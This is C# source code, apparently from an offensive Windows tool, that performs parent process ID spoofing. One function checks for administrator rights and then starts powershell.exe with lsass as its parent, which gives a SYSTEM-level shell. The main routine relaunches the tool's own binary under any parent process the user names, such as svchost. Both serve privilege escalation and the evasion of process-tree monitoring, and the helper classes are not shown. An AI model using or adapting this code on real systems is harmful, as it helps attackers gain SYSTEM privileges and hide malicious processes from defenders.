public static void EasySystemPPID()
{
if (!WindowsIdentity.GetCurrent().Owner.IsWellKnown(WellKnownSidType.BuiltinAdministratorsSid))
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[!] For this function to succeed, you need UAC Elevated Administrator privileges.");
Console.ResetColor();
return;
}
string szCommandLine = "powershell.exe";
string PPIDName = "lsass";
int NewPPID = 0;
// Find PID from our new Parent and start new Process with new Parent ID
NewPPID = ProcessCreator.NewParentPID(PPIDName);
if (NewPPID == 0)
{
Console.WriteLine("\n[!] No suitable Process ID Found...");
return;
}
if (!ProcessCreator.CreateProcess(NewPPID, null, szCommandLine))
{
Console.WriteLine("\n[!] Oops PPID Spoof failed...");
return;
}
return;
}
public static void Main(string[] args)
{
// Get Assembly Path
string BinaryPath = Assembly.GetExecutingAssembly().CodeBase;
string lpApplicationName = BinaryPath.Replace("file:///", string.Empty).Replace("/", @"\");
if (args.Length == 1 && args[0].ToLower() == "-parent")
{
Console.WriteLine("\n [+] Please enter a valid Parent Process name.");
Console.WriteLine(" [+] For Example: {0} -parent svchost", lpApplicationName);
return;
}
else if (args.Length == 2)
{
if (args[0].ToLower() == "-parent" && args[1] != null)
{
string PPIDName = args[1];
int NewPPID = 0;
// Find PID from our new Parent and start new Process with new Parent ID
NewPPID = ProcessCreator.NewParentPID(PPIDName);
if (NewPPID == 0)
{
Console.WriteLine("\n [!] No suitable Process ID Found...");
return;
}
if (!ProcessCreator.CreateProcess(NewPPID, lpApplicationName, null))
{
Console.WriteLine("\n [!] Oops PPID Spoof failed...");
return;
}
}
}
else
{
Entry();
}
return;
}
